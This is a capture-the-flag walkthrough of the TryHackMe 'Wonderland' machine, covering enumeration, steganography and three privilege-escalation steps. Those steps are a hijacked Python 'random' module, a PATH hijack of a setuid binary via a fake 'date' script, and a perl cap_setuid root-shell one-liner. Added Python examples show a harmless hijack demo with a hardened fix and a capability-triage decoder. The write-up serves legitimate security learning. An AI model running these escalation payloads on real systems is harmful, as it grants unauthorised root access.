Info

Name: Wonderland
Difficulty: Medium
Released: Fri 05 Jun 2020
Creator: NinjaJc01
URL: https://tryhackme.com/room/wonderland

Enumeration

As always we start with an nmap scan of the machine (default scripts and version detection, output saved under nmap/):

nmap -sC -sV -oA nmap/all-tcp 10.10.167.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST
Nmap scan report for 10.10.167.35
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We only have two ports open: 22 and 80.

Visiting the web server reveals the following page:

We also do a directory scan with ffuf and find the following directories:

ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.167.35/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
poem                    [Status: 301, Size: 0, Words: 1, Lines: 1]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 ::

After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and check whether something was hidden in it (steghide with an empty passphrase is always worth a try):

wget http://10.10.167.35/img/white_rabbit_1.jpg
--2020-06-06 00:04:02--  http://10.10.167.35/img/white_rabbit_1.jpg
Connecting to 10.10.167.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’

white_rabbit_1.jpg	100%[==============================================================>]   1.90M  4.57MB/s    in 0.4s    

2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]

steghide extract -sf white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".
s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt 
follow the r a b b i t

My immediate thought was that r a b b i t might be spelling out a URL path, starting from the /r directory that ffuf had already found:

Looking at the source reveals something that looks like credentials:

We can now use the credentials above and SSH into the box.

Initial Foothold

We now have access to the machine, but doing an ls -la we notice something weird: the root.txt file is located in our user's home directory, and it is only readable by root.

ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root  root  4096 May 25 17:52 ..
lrwxrwxrwx 1 root  root     9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice  807 May 25 02:36 .profile
-rw------- 1 root  root    66 May 25 17:08 root.txt
-rw-r--r-- 1 root  root  3577 May 25 02:43 walrus_and_the_carpenter.py

After a bit of tinkering (and looking at the hint) we try the mirror image of that layout: if the root flag lives in /home/alice, the user flag may live in /root.

cat /root/user.txt
thm{FLAG-REDACTED}

We finally have the user flag! Now, let's priv esc to root.

Privilege Escalation

Looking at our privileges with sudo -l reveals the following:

sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

So we can run /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py via sudo as the user rabbit, and nothing else.

The script is owned by root and we only have read access to it, so we can't edit it, but we can still read what it does when executed:

import random                                                                                                                                                                                                                              
poem = """The sun was shining on the sea,                                                                                                                                                                                                  
Shining with all his might:                                                                                                                                                                                                                
He did his very best to make                                                                                                                                                                                                               
The billows smooth and bright —                                                                                                                                                                                                            
And this was odd, because it was                                                                                                                                                                                                           
The middle of the night.                                                                                                                                                                                                                   
                                                                                                                                                                                                                                           
The moon was shining sulkily,                                                                                                                                                                                                              
Because she thought the sun                                                                                                                                                                                                                
Had got no business to be there                                                                                                                                                                                                            
After the day was done —                                                                                                                                                                                                                   
"It’s very rude of him," she said,                                                                                                                                                                                                         
"To come and spoil the fun!"                                                                                                                                                                                                               
                                                                                                                                                                                                                                           
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

[...]

for i in range(10):
    line = random.choice(poem.split("\n"))

Due to the length of the file, I've removed most of the poem; the script just picks random lines from it and prints them.

At the top of the file we can see that the Python module random is imported.
When Python runs a script it puts the script's own directory (not the current working directory) at the front of sys.path, and here that directory is /home/alice, which we own. So if we create a file named random.py in /home/alice that executes /bin/bash, our file is loaded instead of the "real" random module from the standard library, and since the script runs as rabbit, that gives us a shell as rabbit.

Our random.py:

import os

os.system("/bin/bash")

Executing the python script:

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit

Awesome! We have escalated our privileges to the rabbit user.

Looking in /home/rabbit/ we find a setuid binary, teaParty, and examining the file shows the shell command it runs: /bin/echo is called by absolute path, but date is not.

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)

We can abuse this by prepending a directory we control to $PATH, writing a small script called date in it, and running the setuid binary; the binary inherits our environment, so its shell resolves date through our $PATH.

Exporting our own $PATH:

rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now, every time a program is called without an absolute path, the shell (including the one the setuid binary spawns) will look in /tmp first.

Creating our malicious date file

We now create a shell script called date, place that in /tmp and make it executable with chmod +x /tmp/date.

rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash

All we now need to do is run the setuid binary and we should escalate to the user hatter.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)

Awesome! We're getting close. Note that id reports uid=1003, i.e. the real uid is already hatter, which is why the plain /bin/bash in our fake date kept the privilege; if the binary had only raised the effective uid, bash would have dropped it back to rabbit on startup and the payload would have needed bash -p (or its own setuid call) instead.
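The PATH hijack above, as an added example that is not part of the original write-up: it drives the same shell command teaParty builds (a constructed stand-in, nothing here is setuid) with an attacker-controlled date placed first on PATH, and contrasts it with a hardened version that uses an absolute path and pins PATH before running anything. The fake date prints a marker instead of executing /bin/bash, and the temporary directory stands in for /tmp; both are assumptions made for the demo.

```python
import os
import stat
import subprocess
import tempfile

# Constructed stand-in for the command teaParty runs: /bin/echo by absolute path,
# but date by bare name, the pattern the write-up found in the binary.
VULNERABLE_CMD = "/bin/echo -n 'Probably by ' && date -u +%Y"

# Hardened variant: absolute path for date, and PATH pinned to trusted
# directories before any bare command could be resolved.
HARDENED_CMD = "export PATH=/usr/bin:/bin; /bin/echo -n 'Probably by ' && /bin/date -u +%Y"

# The attacker's 'date'. The write-up's version execs /bin/bash; this one only
# announces that it ran so the demo is harmless.
FAKE_DATE = "#!/bin/sh\necho HIJACKED\n"


def run_with_hijacked_path(command: str) -> str:
    """Create an attacker-controlled date, prepend its directory to PATH the way
    'export PATH=/tmp:$PATH' does, run the command through sh and return stdout."""
    with tempfile.TemporaryDirectory() as evil_dir:   # plays the role of /tmp
        fake = os.path.join(evil_dir, "date")
        with open(fake, "w") as fh:
            fh.write(FAKE_DATE)
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)   # chmod +x
        inherited = os.environ.get("PATH", "/usr/bin:/bin")
        env = dict(os.environ, PATH=evil_dir + os.pathsep + inherited)
        # system() in the setuid binary does exactly this: /bin/sh -c "<command>"
        # with the caller's environment, PATH included.
        proc = subprocess.run(["/bin/sh", "-c", command], env=env,
                              capture_output=True, text=True)
        return proc.stdout


def hijacked(command: str) -> bool:
    """True if the attacker's date ran instead of the system one."""
    return "HIJACKED" in run_with_hijacked_path(command)


if __name__ == "__main__":
    print("vulnerable command hijacked:", hijacked(VULNERABLE_CMD))
    print("hardened command hijacked:  ", hijacked(HARDENED_CMD))
```

The point of the hardened line is that fixing only the binary name is not enough on its own: a setuid program that calls system() should reset PATH (or, better, avoid the shell and execve a full path), because everything in the environment it inherits is attacker-controlled.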

Looking in the home directory of the user hatter reveals a password in cleartext. Using it to SSH in gives us a proper shell as hatter, with hatter's own group instead of the leftover rabbit gid:

ssh hatter@10.10.167.35
hatter@10.10.167.35's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jun  5 22:48:04 UTC 2020

  System load:  0.07               Processes:           95
  Usage of /:   19.4% of 19.56GB   Users logged in:     1
  Memory usage: 32%                IP address for eth0: 10.10.167.35
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jun  5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)

Doing some basic enumeration reveals that perl has the file capability cap_setuid+ep, i.e. CAP_SETUID is both permitted and effective whenever perl is executed, no setuid bit required:

hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

With CAP_SETUID effective, perl's setuid(0) call simply succeeds, so one line gives us a root shell:

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)
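Added example, not part of the original write-up: what getcap actually shows is the security.capability extended attribute on the file, a struct vfs_cap_data. The decoder below parses that structure (revisions 1, 2 and 3), renders it roughly the way getcap does, and flags capabilities that are root-equivalent for an unprivileged caller, which is the check you want when triaging getcap -r output on a box. The byte strings for /usr/bin/perl and /usr/bin/mtr-packet are constructed to match the two getcap lines above, not read from the machine, and the DANGEROUS triage list is an assumption of the example rather than an official classification.

```python
import os
import struct

# Capability bit numbers from <linux/capability.h>; list index == bit number.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]
# Triage list (assumed for this example): caps that hand a low-privileged user
# root, or the means to get it, when set on a binary that user can run.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_chown", "cap_fowner", "cap_sys_module", "cap_sys_ptrace",
             "cap_sys_admin", "cap_setfcap"}

VFS_CAP_REVISION_1 = 0x01000000
VFS_CAP_REVISION_2 = 0x02000000
VFS_CAP_REVISION_3 = 0x03000000
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001


def _names(bits: int) -> list:
    return [CAP_NAMES[b] if b < len(CAP_NAMES) else "cap_%d" % b
            for b in range(bits.bit_length()) if bits >> b & 1]


def decode_vfs_cap(blob: bytes) -> dict:
    """Decode struct vfs_cap_data, the security.capability xattr that getcap reads."""
    (magic,) = struct.unpack_from("<I", blob, 0)
    revision = magic & VFS_CAP_REVISION_MASK
    if revision == VFS_CAP_REVISION_1:
        permitted, inheritable = struct.unpack_from("<II", blob, 4)
    elif revision in (VFS_CAP_REVISION_2, VFS_CAP_REVISION_3):
        # two (permitted, inheritable) u32 pairs: low word first, then high word
        p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<IIII", blob, 4)
        permitted, inheritable = p_lo | p_hi << 32, i_lo | i_hi << 32
    else:
        raise ValueError("unknown vfs_cap revision 0x%08x" % revision)
    # v3 appends the kuid that counts as root for a namespaced file capability
    rootid = struct.unpack_from("<I", blob, 20)[0] if revision == VFS_CAP_REVISION_3 else 0
    return {
        "permitted": _names(permitted),
        "inheritable": _names(inheritable),
        # a single flag covering the whole permitted set; getcap shows it as the 'e' in +ep
        "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
        "rootid": rootid,
    }


def getcap_text(blob: bytes) -> str:
    """Render a blob roughly the way getcap does, e.g. 'cap_setuid+ep'.
    Simplified: real cap_to_text groups caps with differing flags separately."""
    caps = decode_vfs_cap(blob)
    names = sorted(set(caps["permitted"]) | set(caps["inheritable"]))
    flags = (("e" if caps["effective"] else "") + ("i" if caps["inheritable"] else "")
             + ("p" if caps["permitted"] else ""))
    return ",".join(names) + "+" + flags


def dangerous_caps(blob: bytes) -> list:
    """Permitted capabilities from the triage list."""
    return [c for c in decode_vfs_cap(blob)["permitted"] if c in DANGEROUS]


def read_file_caps(path: str):
    """Read security.capability from a real file (Linux only); None if absent."""
    if not hasattr(os, "getxattr"):
        return None
    try:
        return os.getxattr(path, "security.capability")
    except OSError:   # ENODATA (no caps set), ENOTSUP, EACCES, ...
        return None


# Constructed blobs matching the two getcap lines in the write-up (not read from the box).
PERL_BLOB = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0)   # cap_setuid+ep
MTR_BLOB = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 13, 0, 0, 0)   # cap_net_raw+ep
# Same as PERL_BLOB but namespaced (v3, assumed rootid 100000): honoured only from a
# user namespace whose root maps to kuid 100000, so it is not a host-root finding.
PERL_NS_BLOB = struct.pack("<IIIIII", VFS_CAP_REVISION_3 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0, 100000)

if __name__ == "__main__":
    for path, blob in (("/usr/bin/perl", PERL_BLOB), ("/usr/bin/mtr-packet", MTR_BLOB)):
        live = read_file_caps(path) or blob   # fall back to the constructed blob off-box
        print(path, "=", getcap_text(live), "DANGEROUS:", ",".join(dangerous_caps(live)) or "-")
```

On a live Linux host read_file_caps() can be pointed at every file getcap -r lists; anything on the triage list that is executable by an unprivileged user deserves the same attention as a setuid-root binary, because, as the perl one-liner shows, it is one.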

The uid is now 0 while the gid is still hatter, since only setuid was called, but that is enough to read the root.txt flag sitting in alice's home:

# cat /home/alice/root.txt
thm{FLAG-REDACTED}